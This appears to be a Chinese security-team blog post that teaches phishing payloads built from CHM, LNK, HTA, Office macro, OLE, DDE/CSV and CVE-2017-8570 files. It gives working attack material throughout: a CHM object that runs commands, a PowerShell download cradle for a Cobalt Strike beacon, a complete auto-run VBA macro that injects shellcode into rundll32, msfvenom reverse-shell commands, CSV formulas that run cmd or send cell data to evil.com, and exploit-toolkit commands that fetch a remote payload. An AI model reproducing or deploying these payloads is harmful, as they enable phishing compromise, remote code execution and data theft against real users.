沃·兹基硕德小贴士
分享时间到!
CHM、LNK、HTA文件钓鱼
CHM
CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用 HTML 作源文,把帮助内容以类似数据库的形式编译储存。
使用 EasyCHM 可以轻松的新建一个 chm 文件,首先新建一个文件夹,然后在文件夹中新建一个 html 文件,html 代码如下。
<html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',calc.exe'><PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
LNK
SystemRoot%system32cmd.exe cmd /c 要执行的命令
Attacks->Web Drive-by->Scripted Web Delivery 功能可以建立一个脚本分发站点,建立成功后会提示使用类似 powershell.exe -nop -c -w "IEX ((new-object net.webclient).downloadstring('http://ip/uri'))" 的命令来下载对应 listener 反弹 beacon 的脚本。
HTA
Attacks->packages->HTML application生成 .hta 文件,可以选择通过 exe、powershell 或 VBA 进行执行,经测试 powershell 的方式可以成功上线,而 exe和 vba 的执行出错了。
office宏(macros)
Attacks->packages->MS Office Micro 模块有自动生成宏代码的功能。宏代码大致如下,通过 rundll32.exe 运行 shellcode。Private Type PROCESS_INFORMATIONhProcess As LonghThread As LongdwProcessId As LongdwThreadId As LongEnd TypePrivate Type STARTUPINFOcb As LonglpReserved As StringlpDesktop As StringlpTitle As StringdwX As LongdwY As LongdwXSize As LongdwYSize As LongdwXCountChars As LongdwYCountChars As LongdwFillAttribute As LongdwFlags As LongwShowWindow As IntegercbReserved2 As IntegerlpReserved2 As LonghStdInput As LonghStdOutput As LonghStdError As LongEnd Type#If VBA7 ThenPrivate Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtrPrivate Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtrPrivate Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtrPrivate Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#ElsePrivate Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPrivate Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPrivate Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As LongPrivate Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#End IfSub Auto_Open()Dim myByte As Long, myArray As Variant, offset As LongDim pInfo As PROCESS_INFORMATIONDim sInfo As STARTUPINFODim sNull As StringDim sProc As String#If VBA7 ThenDim rwxpage As LongPtr, res As LongPtr#ElseDim rwxpage As Long, res As Long#End IfmyArray = Array(shellcode)If Len(Environ("ProgramW6432")) > 0 ThensProc = Environ("windir") & "\SysWOW64\rundll32.exe"ElsesProc = Environ("windir") & "\System32\rundll32.exe"End Ifres = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)For offset = LBound(myArray) To UBound(myArray)myByte = myArray(offset)res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)Next offsetres = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)End SubSub AutoOpen()Auto_OpenEnd SubSub Workbook_Open()Auto_OpenEnd Sub
OLE
msfvenom -p windows/meterpreter/reverse_http lhost=ip lport=port -f vbs -o payload.vbs通过插入 -> 对象 -> 由文件创建 -> 浏览,选择要插入的 vbs 脚本,可以勾选显示为图标。
成功上线。
DDE
CSV(comma-separated value,CSV)是一种用于存储结构化数据的简单数据格式,它可以用作 Excel 的数据源(即 Excel 能够对其进行相应的解析,并使用分隔符间的数据填充单元格)。实际上,如果文件格式与文件扩展名不一致,Excel 似乎会恢复到 CSV 模式;另外,我们可以使用 Excel 来打开具有这种文件扩展名的文件。
根据 Microsoft 的说法,DDE(动态数据交换)是在应用程序之间传输数据的方法之一。DDE 在 Excel 中的一种用途,是根据外部应用程序的结果来更新单元格的内容。因此,如果制作包含 DDE 公式的 CSV 文件,则在打开时,由于 DDE 的缘故,Excel 将尝试执行外部应用程序,这将导致通过执行 cmd 来执行系统命令。
当我们打开文件时,Excel 会对文件的每一行分别进行检查。在对各行的内容进行分隔并复制到适当的单元格之前,Excel 会检查该行是否存在命令字符,即用于内部函数的字符:"="、"+"、"-" 和 "@"。
根据命令前缀的不同,可能会发生以下两种情况之一:
-
如果前缀是"="、"+"或"-",则将其余部分视为表达式。
-
如果前缀为"@",Excel 将搜索内部函数(例如SUM())并将参数解释为表达式。
利用方式举例
-
利用函数执行命令:
=SUM(cmd|'/c calc'!A0)
重新打开该文档,会提示是否更新其他数据源的链接,选更新。
然后会提示是否启动 cmd,选择是。
便会通过 cmd 执行命令,如图为打开计算器。
若要进行利用可以通过上述 cmd 执行 powershell 的方式或通过其他方式下载 exe 并执行的方式进行利用。
-
利用 HYPERLINK 函数请求恶意 url 带出表格内数据:
=HYPERLINK("https://evil.com/data="&A2&A3,"Error: Please click me!")
将函数插入到表格中并保存文档。
CVE
-
首先生成恶意的 ppsx 文件
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://toolkitserver.com/logo.doc
-
用 msfvenom 或 cobalt strike 生成反弹 shell 的 payload,并放到远程服务器上
msfvenom -p windows/meterpreter/reverse_http LHOST=ip LPORT=port -f exe > shell.exe-
开启 toolkit 的 exp 模式,用来中转远程的 payload
python cve-2017-8570_toolkit.py -M exp -e http://remoteserver.com/shell.exe
Reference:《黑客大揭秘:近源渗透测试》
陌陌安全致力于以务实的工作保障陌陌旗下所有产品及亿万用户的信息安全,以开放的心态拥抱信息安全机构、团队与个人之间的共赢协作,以自由的氛围和丰富的资源支撑优秀同学的个人发展与职业成长。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论